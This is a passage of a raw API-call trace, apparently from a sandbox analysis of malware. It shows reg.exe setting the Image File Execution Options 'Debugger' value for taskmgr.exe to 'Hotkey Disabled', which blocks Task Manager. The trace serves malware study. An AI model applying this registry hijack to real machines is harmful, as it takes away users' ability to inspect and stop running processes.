Flags=0xc, Size=0x18) returned 0x38b620 [0203.119] lstrlenW (lpString="") returned 0 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x2) returned 0x38b640 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385a00 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x18) returned 0x38b660 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385a30 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385a60 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385a90 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385ac0 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x18) returned 0x38b680 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385af0 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385b20 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385b50 [0203.119] GetProcessHeap () returned 0x370000 [0203.119] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385b80 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x18) returned 0x38b6a0 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385bb0 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385be0 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385c10 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385c40 [0203.120] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x18) returned 0x38b6c0 [0203.120] _memicmp (_Buf1=0x38b6c0, _Buf2=0xff301458, _Size=0x7) returned 0 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x1e) returned 0x385c70 [0203.120] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x18) returned 0x38b6e0 [0203.120] _memicmp (_Buf1=0x38b6e0, _Buf2=0xff301458, _Size=0x7) returned 0 [0203.120] GetProcessHeap () returned 0x370000 [0203.120] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0xbc) returned 0x38b860 [0203.121] _vsnwprintf (in: _Buffer=0x385c70, _BufferCount=0xe, _Format="|%s|", _ArgList=0x28fa48 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0203.121] _vsnwprintf (in: _Buffer=0x38b860, _BufferCount=0x5d, _Format="|%s|", _ArgList=0x28fa48 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe|") returned 92 [0203.121] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0203.121] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe|") returned 92 [0203.121] SetLastError (dwErrCode=0x490) [0203.121] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0203.121] GetProcessHeap () returned 0x370000 [0203.121] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0xb6) returned 0x38b930 [0203.121] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0203.121] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0203.122] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.122] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0203.123] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0203.123] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0203.123] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0203.123] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0203.124] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.124] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0203.124] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0203.124] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0203.124] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0203.124] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0203.125] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0203.125] GetProcessHeap () returned 0x370000 [0203.125] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x28) returned 0x385ca0 [0203.125] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0203.125] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0203.125] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0203.125] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0203.126] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0203.126] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0203.126] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0203.126] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.126] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.126] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.126] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0203.126] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.126] StrChrIW (lpStart="Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0203.126] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.126] StrChrIW (lpStart="Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" [0203.127] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.127] StrChrIW (lpStart="CurrentVersion\\Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\Image File Execution Options\\taskmgr.exe" [0203.127] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.127] StrChrIW (lpStart="Image File Execution Options\\taskmgr.exe", wMatch=0x5c) returned="\\taskmgr.exe" [0203.127] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.127] StrChrIW (lpStart="taskmgr.exe", wMatch=0x5c) returned 0x0 [0203.127] SetLastError (dwErrCode=0x490) [0203.127] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.127] SetLastError (dwErrCode=0x0) [0203.127] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 85 [0203.127] GetProcessHeap () returned 0x370000 [0203.127] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0xac) returned 0x38bbe0 [0203.127] GetProcessHeap () returned 0x370000 [0203.127] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0xd8) returned 0x38bca0 [0203.127] GetProcessHeap () returned 0x370000 [0203.127] GetProcessHeap () returned 0x370000 [0203.128] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385ca0) returned 1 [0203.128] GetProcessHeap () returned 0x370000 [0203.128] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385ca0) returned 0x28 [0203.128] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385ca0 | out: hHeap=0x370000) returned 1 [0203.128] GetProcessHeap () returned 0x370000 [0203.128] GetProcessHeap () returned 0x370000 [0203.128] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b930) returned 1 [0203.128] GetProcessHeap () returned 0x370000 [0203.128] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b930) returned 0xb6 [0203.128] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b930 | out: hHeap=0x370000) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0203.128] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0203.128] lstrlenW (lpString="Debugger") returned 8 [0203.129] GetProcessHeap () returned 0x370000 [0203.129] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x12) returned 0x38b700 [0203.129] lstrlenW (lpString="Debugger") returned 8 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0203.129] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0203.129] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0203.129] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0203.129] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0203.129] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0203.129] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0203.129] lstrlenW (lpString="REG_SZ") returned 6 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0203.129] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0203.130] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0203.130] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0203.130] LocalFree (hMem=0x38b930) returned 0x0 [0203.130] SetLastError (dwErrCode=0x0) [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0203.130] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0203.130] lstrlenW (lpString="Hotkey Disabled") returned 15 [0203.130] GetProcessHeap () returned 0x370000 [0203.130] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x20) returned 0x385ca0 [0203.130] SetLastError (dwErrCode=0x0) [0203.130] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x28fb20, lpdwDisposition=0x28fb40 | out: phkResult=0x28fb20*=0x54, lpdwDisposition=0x28fb40*=0x1) returned 0x0 [0203.131] RegQueryValueExW (in: hKey=0x54, lpValueName="Debugger", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0203.131] lstrlenW (lpString="Hotkey Disabled") returned 15 [0203.131] RegSetValueExW (in: hKey=0x54, lpValueName="Debugger", Reserved=0x0, dwType=0x1, lpData="Hotkey Disabled", cbData=0x20 | out: lpData="Hotkey Disabled") returned 0x0 [0203.131] RegCloseKey (hKey=0x54) returned 0x0 [0203.131] GetProcessHeap () returned 0x370000 [0203.131] GetProcessHeap () returned 0x370000 [0203.131] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38bbe0) returned 1 [0203.131] GetProcessHeap () returned 0x370000 [0203.131] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38bbe0) returned 0xac [0203.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38bbe0 | out: hHeap=0x370000) returned 1 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38bca0) returned 1 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38bca0) returned 0xd8 [0203.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38bca0 | out: hHeap=0x370000) returned 1 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b700) returned 1 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b700) returned 0x12 [0203.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b700 | out: hHeap=0x370000) returned 1 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385ca0) returned 1 [0203.132] GetProcessHeap () returned 0x370000 [0203.132] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385ca0) returned 0x20 [0203.132] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385ca0 | out: hHeap=0x370000) returned 1 [0203.132] SetLastError (dwErrCode=0x0) [0203.132] GetLastError () returned 0x0 [0203.132] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x28faa0, nSize=0x0, Arguments=0x0 | out: lpBuffer="뤰8") returned 0x27 [0203.133] GetLastError () returned 0x0 [0203.133] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0203.133] GetProcessHeap () returned 0x370000 [0203.133] GetProcessHeap () returned 0x370000 [0203.133] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b640) returned 1 [0203.133] GetProcessHeap () returned 0x370000 [0203.133] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b640) returned 0x2 [0203.133] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b640 | out: hHeap=0x370000) returned 1 [0203.133] GetProcessHeap () returned 0x370000 [0203.133] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x50) returned 0x38b990 [0203.133] SetLastError (dwErrCode=0x0) [0203.133] LocalFree (hMem=0x38b930) returned 0x0 [0203.134] __iob_func () returned 0x7fefdf72a80 [0203.134] _fileno (_File=0x7fefdf72ab0) returned 1 [0203.134] _errno () returned 0xd4bb0 [0203.134] _get_osfhandle (_FileHandle=1) returned 0x10c [0203.134] _errno () returned 0xd4bb0 [0203.134] GetFileType (hFile=0x10c) returned 0x3 [0203.134] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0203.134] GetConsoleOutputCP () returned 0x1b5 [0203.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0203.192] GetConsoleOutputCP () returned 0x1b5 [0203.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The operation completed successfully.\r\n", cchWideChar=39, lpMultiByteStr=0xff312710, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The operation completed successfully.\r\n", lpUsedDefaultChar=0x0) returned 39 [0203.192] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 39 [0203.193] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0203.193] GetProcessHeap () returned 0x370000 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b860) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b860) returned 0xbc [0203.194] 